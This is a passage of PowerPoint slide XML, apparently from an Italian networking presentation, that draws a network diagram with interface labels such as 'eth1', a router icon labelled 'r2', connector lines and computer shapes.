              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9262" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF63E3E9-CB4F-02C5-729E-898B13BD6CBB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9263" name="Group 227">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D17ABDAF-7568-1224-44C5-0069065F5C39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4962850" y="4602893"/>
            <a:ext cx="441381" cy="243680"/>
            <a:chOff x="2859" y="339"/>
            <a:chExt cx="384" cy="212"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9264" name="Group 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C47499A-D17A-16BC-5B4C-B34DEEED46B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2859" y="339"/>
              <a:ext cx="384" cy="212"/>
              <a:chOff x="5178" y="2567"/>
              <a:chExt cx="960" cy="528"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="9266" name="AutoShape 229">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{579439D8-FEFE-A7EF-D093-54AD57DDF201}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5178" y="2567"/>
                <a:ext cx="960" cy="528"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstGeom>
              <a:gradFill rotWithShape="0">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                  <a:gs pos="50000">
                    <a:srgbClr val="0066CC"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="002F5E"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="0" scaled="1"/>
              </a:gradFill>
              <a:ln w="9525">
                <a:solidFill>
                  <a:srgbClr val="819F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3025" tIns="36512" rIns="73025" bIns="36512"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it-IT" altLang="it-IT"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="9267" name="Group 231">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70B551E3-90F6-9EC7-3021-E5C6E2B55E54}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="5372" y="2597"/>
                <a:ext cx="595" cy="204"/>
                <a:chOff x="3028" y="2194"/>
                <a:chExt cx="823" cy="291"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9268" name="Freeform 232">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8563FD8-30A5-A16C-B4ED-92A1B7CC99E0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3458" y="2201"/>
                  <a:ext cx="393" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 393"/>
                    <a:gd name="T3" fmla="*/ 125 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 393"/>
                    <a:gd name="T5" fmla="*/ 42 h 125"/>
                    <a:gd name="T6" fmla="*/ 393 w 393"/>
                    <a:gd name="T7" fmla="*/ 70 h 125"/>
                    <a:gd name="T8" fmla="*/ 342 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="42"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="70"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="342" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9269" name="Freeform 234">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{429359C7-4A59-69DC-4857-2CC0169C11A3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3028" y="2348"/>
                  <a:ext cx="393" cy="132"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 28 h 132"/>
                    <a:gd name="T2" fmla="*/ 305 w 393"/>
                    <a:gd name="T3" fmla="*/ 0 h 132"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 83 h 132"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 55 h 132"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 132 h 132"/>
                    <a:gd name="T10" fmla="*/ 305 w 393"/>
                    <a:gd name="T11" fmla="*/ 132 h 132"/>
                    <a:gd name="T12" fmla="*/ 196 w 393"/>
                    <a:gd name="T13" fmla="*/ 104 h 132"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 28 h 13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93" h="132">
                      <a:moveTo>
                        <a:pt x="393" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="305" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="83"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="55"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9270" name="Freeform 236">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81811A58-DFB8-72B8-FFA9-96FA9BE8E8D1}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3050" y="2194"/>
                  <a:ext cx="392" cy="125"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 392"/>
                    <a:gd name="T1" fmla="*/ 28 h 125"/>
                    <a:gd name="T2" fmla="*/ 87 w 392"/>
                    <a:gd name="T3" fmla="*/ 0 h 125"/>
                    <a:gd name="T4" fmla="*/ 298 w 392"/>
                    <a:gd name="T5" fmla="*/ 77 h 125"/>
                    <a:gd name="T6" fmla="*/ 392 w 392"/>
                    <a:gd name="T7" fmla="*/ 56 h 125"/>
                    <a:gd name="T8" fmla="*/ 341 w 392"/>
                    <a:gd name="T9" fmla="*/ 125 h 125"/>
                    <a:gd name="T10" fmla="*/ 94 w 392"/>
                    <a:gd name="T11" fmla="*/ 125 h 125"/>
                    <a:gd name="T12" fmla="*/ 196 w 392"/>
                    <a:gd name="T13" fmla="*/ 104 h 125"/>
                    <a:gd name="T14" fmla="*/ 0 w 392"/>
                    <a:gd name="T15" fmla="*/ 28 h 12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92" h="125">
                      <a:moveTo>
                        <a:pt x="0" y="28"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="87" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="298" y="77"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="392" y="56"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="94" y="125"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="196" y="104"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="28"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9271" name="Freeform 238">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8062CE0-B2AF-02CF-011B-549AD740C575}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3442" y="2361"/>
                  <a:ext cx="393" cy="124"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 393 w 393"/>
                    <a:gd name="T1" fmla="*/ 97 h 124"/>
                    <a:gd name="T2" fmla="*/ 306 w 393"/>
                    <a:gd name="T3" fmla="*/ 124 h 124"/>
                    <a:gd name="T4" fmla="*/ 102 w 393"/>
                    <a:gd name="T5" fmla="*/ 41 h 124"/>
                    <a:gd name="T6" fmla="*/ 0 w 393"/>
                    <a:gd name="T7" fmla="*/ 69 h 124"/>
                    <a:gd name="T8" fmla="*/ 51 w 393"/>
                    <a:gd name="T9" fmla="*/ 0 h 124"/>
                    <a:gd name="T10" fmla="*/ 306 w 393"/>
                    <a:gd name="T11" fmla="*/ 0 h 124"/>
                    <a:gd name="T12" fmla="*/ 197 w 393"/>
                    <a:gd name="T13" fmla="*/ 21 h 124"/>
                    <a:gd name="T14" fmla="*/ 393 w 393"/>
                    <a:gd name="T15" fmla="*/ 97 h 12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93" h="124">
                      <a:moveTo>
                        <a:pt x="393" y="97"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="306" y="124"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="102" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="306" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="197" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="393" y="97"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:extLst>
                  <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
                    <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="9525">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a14:hiddenLine>
                  </a:ext>
                </a:extLst>
              </p:spPr>
              <p:txBody>
                <a:bodyPr/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="it-IT"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9265" name="WordArt 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0984BF71-B0D3-F781-886C-B3867FB49120}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2881" y="428"/>
              <a:ext cx="346" cy="103"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textCanDown">
                <a:avLst>
                  <a:gd name="adj" fmla="val 33333"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="it-IT" sz="1400" kern="10" dirty="0">
                  <a:ln w="9525">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9272" name="Connettore diritto 9271">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59A9D3AE-7140-A451-4106-B8B42FA2B2B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2670433" y="3667061"/>
            <a:ext cx="248187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74" name="Connettore diritto 9273">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A5D4F92-A968-699A-25C9-4BF5255A3286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="41" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2788398" y="4164547"/>
            <a:ext cx="2388820" cy="15436"/>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278" name="Gruppo 9277">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48CB75C9-614D-CEAC-A2E2-D30AC6EDF91B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2180000" y="3348604"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9279" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F75A099D-2BC9-C8E8-0FBF-63B938B7D930}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9280" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6692EA87-37D9-731F-E83B-52E1203C43FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
